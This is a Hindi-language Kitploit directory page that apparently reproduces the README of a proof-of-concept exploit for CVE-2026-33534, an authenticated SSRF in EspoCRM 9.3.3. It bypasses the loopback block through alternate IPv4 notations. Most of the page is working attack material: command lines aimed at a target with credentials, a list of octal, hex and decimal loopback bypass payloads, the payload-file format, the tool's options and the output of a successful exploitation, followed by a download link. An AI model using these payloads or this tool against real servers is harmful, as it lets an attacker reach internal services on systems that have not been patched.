Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33534 — EspoCRM 9.3.3 - वैकल्पिक IPv4 नोटेशन के माध्यम से प्रमाणित SSRF | Kitploit
उपकरण/GitHubGitHub/entrovyx/cve-2026-33534
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubentrovyx/cve-2026-33534

CVE-2026-33534

EspoCRM 9.3.3 - वैकल्पिक IPv4 नोटेशन के माध्यम से प्रमाणित SSRF

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33534 - EspoCRM 9.3.3 प्रमाणित SSRF

EspoCRM 9.3.3 के /api/v1/Attachment/fromImageUrl एंडपॉइंट में वैकल्पिक IPv4 लूपबैक नोटेशन के माध्यम से प्रमाणित SSRF प्रूफ-ऑफ-कॉन्सेप्ट।

सारांश

EspoCRM 9.3.3 http://127.0.0.1/... जैसे सीधे लूपबैक URL को ब्लॉक करता है, लेकिन सर्वर-साइड फ़ेच पथ वैकल्पिक IPv4 प्रस्तुतियों को स्वीकार करता है जिन्हें cURL लूपबैक में सामान्यीकृत करता है। यह एक प्रमाणित उपयोगकर्ता को प्रभावित अटैचमेंट/इमेज अपलोड फ़्लो तक पहुंच के साथ EspoCRM सर्वर को आंतरिक संसाधन फ़ेच करने की अनुमति देता है।

एक्सप्लॉइट पहले सीधा 127.0.0.1 नियंत्रण अनुरोध सबमिट करता है और उम्मीद करता है कि इसे HTTP 403 के साथ ब्लॉक किया जाएगा। फिर यह कई एन्कोडेड लूपबैक पेलोड का परीक्षण करता है और रिपोर्ट करता है कि कौन से संग्रहीत अटैचमेंट उत्पन्न करते हैं।

प्रभावित संस्करण

  • कमजोर: EspoCRM 9.3.3
  • ठीक किया गया: EspoCRM 9.3.4
  • परामर्श: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
  • CVE: CVE-2026-33534
  • CWE: CWE-918
  • आवश्यकताएँ

    • Python 3
    • requests
    • मान्य EspoCRM क्रेडेंशियल
    • लक्ष्य इमेज/अटैचमेंट फ़ील्ड का उपयोग करने की अनुमति

    निर्भरता स्थापित करें:

    root@kitploit:~
    python3 -m pip install requests
    

    उपयोग

    पोर्ट 8083 पर चल रहे EspoCRM इंस्टेंस के विरुद्ध बुनियादी स्थानीय सत्यापन:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u http://127.0.0.1:8083 \
      -U admin \
      -P 'Admin12345!' \
      --internal-port 8083 \
      --cleanup
    

    कस्टम पोर्ट और पथ पर आंतरिक सेवा का परीक्षण करें:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u https://target.example \
      -U user \
      -P 'password' \
      --internal-port 9002 \
      --internal-path /interno.png \
      --cleanup
    

    केवल कस्टम पेलोड का उपयोग करें:

    root@kitploit:~
    python3 CVE-2026-33534.py \
      -u https://target.example \
      -U user \
      -P 'password' \
      --no-default-payloads \
      --payload 0x7f000001 \
      --payload 2130706433
    

    डिफ़ॉल्ट पेलोड

    एक्सप्लॉइट डिफ़ॉल्ट रूप से इन लूपबैक होस्ट प्रस्तुतियों का परीक्षण करता है:

    root@kitploit:~
    0177.0.0.1
    0177.0000.0000.0001
    0177.1
    0x7f.0.0.1
    0x7f.0x0.0x0.0x1
    0x7f000001
    2130706433
    017700000001
    127.1
    127.0.1
    127.000.000.001
    0000000000000000000000000177.0.0.1
    

    कस्टम पेलोड फ़ाइलें समर्थित हैं। प्रत्येक पंक्ति या तो हो सकती है:

    root@kitploit:~
    host
    label=host
    

    उदाहरण:

    root@kitploit:~
    hex-dword=0x7f000001
    decimal-dword=2130706433
    

    इसके साथ चलाएँ:

    root@kitploit:~
    python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload-file payloads.txt
    

    विकल्प

    root@kitploit:~
    -u, --url                 आधार EspoCRM URL
    -U, --username            EspoCRM उपयोगकर्ता नाम
    -P, --password            EspoCRM पासवर्ड
    --internal-port           फ़ेच करने के लिए आंतरिक लूपबैक पोर्ट
    --internal-path           फ़ेच करने के लिए आंतरिक पथ
    --payload                 अतिरिक्त लूपबैक होस्ट नोटेशन
    --payload-file            प्रति पंक्ति एक होस्ट पेलोड वाली फ़ाइल
    --no-default-payloads     केवल कस्टम पेलोड का उपयोग करें
    --field                   अटैचमेंट फ़ील्ड, डिफ़ॉल्ट: avatar
    --parent-type             पैरेंट इकाई प्रकार, डिफ़ॉल्ट: User
    --parent-id               वैकल्पिक पैरेंट इकाई आईडी
    --cleanup                 सफल पेलोड द्वारा बनाए गए अटैचमेंट हटाएं
    --stop-on-first           पहले सफल बाईपास के बाद रुकें
    --insecure                TLS प्रमाणपत्र सत्यापन अक्षम करें
    

    अपेक्षित आउटपुट

    सफल शोषण सीधे लूपबैक नियंत्रण को ब्लॉक किया गया और एक या अधिक एन्कोडेड पेलोड स्वीकृत दिखाता है:

    root@kitploit:~
    [*] Control response: HTTP 403 Not allowed URL.
    [+] octal dotted             0177.0.0.1        HTTP 200 id=... type=image/svg+xml size=4438
    [+] hex dword                0x7f000001        HTTP 200 id=... type=image/svg+xml size=4438
    
    [+] Vulnerable behavior confirmed.
    [+] Direct loopback control: HTTP 403
    [+] Successful payloads: 12
    

    नोट्स

    • डिफ़ॉल्ट PoC लक्ष्य के अपने लूपबैक लिसनर से /client/img/logo-light.svg फ़ेच करता है। किसी अन्य आंतरिक सेवा के लिए --internal-port और --internal-path समायोजित करें।
    • डिफ़ॉल्ट फ़ील्ड User.avatar है; यदि परीक्षण किए गए खाते को अलग अपलोड संदर्भ की आवश्यकता हो तो --field, --parent-type, और --parent-id का उपयोग करें।
    • परीक्षण के दौरान बनाए गए अटैचमेंट को स्वचालित रूप से हटाने के लिए --cleanup का उपयोग करें।
    टूल डाउनलोड करें